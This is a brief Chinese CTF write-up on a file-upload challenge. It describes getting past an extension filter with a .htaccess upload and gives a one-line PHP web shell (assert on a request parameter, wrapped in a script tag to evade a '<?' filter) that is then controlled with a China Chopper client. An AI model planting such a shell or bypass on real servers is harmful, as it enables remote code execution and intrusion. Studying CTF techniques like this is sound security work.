還是多積累吧,練得少沒啥思路,借鑒其他大佬的wp
試了一下上傳格式不支持.jpg和.gif,但是可以用png,根據提示不能上傳帶有ph的格式,試一下.hatcess,成功懟進去了
上傳普通的一句話會被和諧掉,大佬說可能過濾了 <?
用js引用php可以繞過過濾
<script language='php'>assert($_REQUEST['cmd'])</script>
之后就可以用菜刀直接連接
但是終端用不了
在phpinfo中可以看到禁用了非常多的函數
不過可以直接在根目錄下找到flag
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。